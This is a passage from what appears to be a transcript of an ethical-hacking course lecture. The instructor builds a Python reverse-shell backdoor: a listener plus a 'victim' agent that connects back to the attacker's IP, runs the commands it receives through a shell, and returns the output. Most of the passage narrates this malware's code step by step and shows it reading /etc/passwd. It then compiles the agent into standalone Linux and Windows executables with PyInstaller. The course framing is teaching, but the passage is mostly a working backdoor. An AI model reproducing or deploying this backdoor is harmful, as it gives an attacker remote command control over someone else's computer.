input, enter command. So we are asking the hacker to enter his or her command. And then we say command or CMD is equal to cmd.encode. So we want to encode the command string. And then we say victim, which was the socket returning object. So we can act on that. So as you recall, it said, yeah, return a new socket representing the connection and also the IP address. So we got the IP address for this announcement, and we get the new socket to send back some data to it. So victim dot send, as simple as that, my CMD. So send my CMD to it and print command send or sent to the target. Then we wait for the output. We say output is equal to victim. So on this socket, receive 1024. Yeah, if you hover over receive, So receive 1024 bytes of data. So decode the output for me. Output is equal to output.decode. So output.decode. Because when you are sending to the socket, you should do encode, and when you are getting back data, so you see like this, when you're getting back data, you should decode the data to be human readable or something like that. And then we say, so format this string, command output equal to \n to have the command output on a new line. That's it. So that's our listener and the code that will do the hacker side for us. Let's create the backdoor. So malware.py, we could also rename it to hacker.py and victim, but I want to call this one victim.py. So in victim.py, we want to create our agent or our payload, our beacon, whatever it is called. It's an agent on the victim's computer, executes, connect back to us, and waits for instructions. So import socket as always. And for running commands, we need subprocess. So import another module called subprocess. We say connect back IP is equal to 10.10.06. So the agent should connect to this address. Connect back port is equal to 4443, as you recall in here. So connect to this on this port. So we say backdoor is equal to socket.socket as always. So create a new socket for me. And simply we say backdoor.connect to a tuple with connect back IP and connect back port. So as simple as that, we have been connected to our master in here, or the malware command and control, or C2. And now we should wait for commands from the server in here. So let's close for the scanner. So we need a loop. We use true. While true, cmd is equal to backdoor, so our socket dot receive. We want to receive 1024 bytes. We have to decode that, cmd.decode. So when receiving, we do decode. When sending, we do encode before sending. And we want to say ops is equal to, with subprocess, we want to open a process or a child program. So you say execute a child program in a new process. What do we want to run? We want to run cmd with some parameters. Shell is equal to through stderr, so stderr, which is the standard error output, would be subprocess dot pipe, which means get the errors in the same console that I'm seeing the command outputs. And stdout is also equal to, not stроut, stdout is equal to subprocess dot pipe, and we have extra L in here. So this will execute our command and save the results inside ops variable. And we say output is equal to ops dot stdout dot read. So read the command output in here. We want to read, so output underscore errors op.std error dot read. So we want to see the output on this variable output. We want to see the errors inside output errors. So separating errors from successful commands. And we want to send back backdoor.send two parameters. First is output, second is output errors. So what really happens is when victim is running, it will connect to the 10.10.06.443. It waits for our commands to receive 1024 bytes at the time or at a time. It will decode our commands, execute our commands, separate errors, these errors from standard output, std out, and a standard error output. And then it will send the output and also output errors to the master. So this command in here will send the results to 10.10.06 port 443. And in here malware just listens for, so see it binds on an address. It waits for our command, we send the command to it, sends it to the victim, and it says, okay, output is equal to receive 1024 bytes, and then it says decode the command and then print the output of our command on the target. So let's run it on ourselves to see what happens. I'm going to go in here, ll python 3. So let's run malware, listening for victim's connection. If I do sudo netstat listen, you see on port 443, Python is listening. And I can run the malware on myself on the same computer, no problem. So victim.py, we have a problem. Invalid syntax. Oh, we missed the comma on victim. So here it should be comma. Launch. We have a problem on line 8. Line 8 in here. Port should not be inside single quotes because it's an integer. But IP address is a string. Run it again, and you see, open the backdoor or malware, 10.10.06 is connected. So who am I? Op is not defined. Let's see. We have ops. So here it should be ops. Let's run it again. Run this again. Run this again. Who am I? So on line 17 it says an integer is required, got type bytes. On line 17 of victim. Yeah, we should add these two items together, not putting a comma in between. So these trial and errors makes you a great scripter or programmer, and that's totally normal. Let's launch it again. Who am I? And it says you are Udemy. So you see command sent to the target, command output, Udemy. I can say netstat ntlpa, and you see the results of netstat. So we have a functional malware running on the target. So I can say, for example, cat etc pass wd. You see everything is printed, and we have full execution control over the target. So let's see if we can port the victim.py program to the target. So we cannot expect the user to run on victim.py. Sometimes Python is not installed. So there's a program called pyinstaller, which will convert your .py files to the exe executables. So let's see, pip3 install pyinstaller, launch. So it is already installed. And as simple as pyinstaller. So for bigger projects and bigger files, it is much more harder to configure, but in here, I think we should be okay. So do we have a help? Of course, but I think the option is one file -w victim.py. And that's it. Seems like the exe file is created. So if I do file on this, it says ELF 64-bit for Linux systems. So it's a compiled for Linux systems. So I can go to this address right here, and without the existence of any Python, I can run just this program in here. So Python 3 malware, and you see in here our malware works. Who am I? Udemy, everything is fine. So ls slash, you see I have full control and the program is running. So if you want to run the exe format, you should go on Windows operating system and compile the file. Okay, we are at the download page of Python. Python downloads release this version. It's enough to search for Python download or Python 3 download. You get the executable, and I want it to be running when the download is done. Okay, the installer is up and running. Add Python to the path. Install launcher for all the users. Install now. So we want to install Python on Windows and then pip install the PyInstaller and compile our Python code to an exe file. So at the same time, I went and transferred my file victim.py from Linux system into here. So if I run python-V, you see the version is okay. So python-m pip install pyinstaller. So this will go and download pyinstaller for us and install it in our environment. So -m is for calling modules within the Python environment. And it is done. So pyinstaller --one file -w victim.py, run it. So you see right off the bat, some files are created in here which are executable, might be in build or somewhere around here. So it says in dist victim.exe. In dist victim.exe. Let's launch also the attacker on the Windows version. So let's launch Explorer in here. Go to the desktop. Victim and malware is modified to work with 10.10.09. So you see, you change the IP addresses also to your corresponding IP address. So let's see. Also the malware is 10.10.09. So everything is fine. Let's launch the server Python malware.py. It's listening for connections. And also at the same time launch Python victim. And we are connected. So if I say who am I? It says you are home-pc tty. If I say do netstat anto for me, you see I get the whole netstat. So you see, creating a malware, a client-server malware with Python is not that hard, but this program also is not that stable that can be used inside any ethical hacking project or in red teaming or any penetration testing operations and stuff like that. But it's just enough for us to learn some Python techniques. And I have one request from you. Work on PowerShell, work on Python, on Ruby, on Bash, PHP. These are scripting and programming languages that you will need as a professional red teamer or an ethical hacker for that matter. So go and practice various scripts and be happy with your custom tools and also artifacts. So that's it for this lecture, and I will see you on the next one.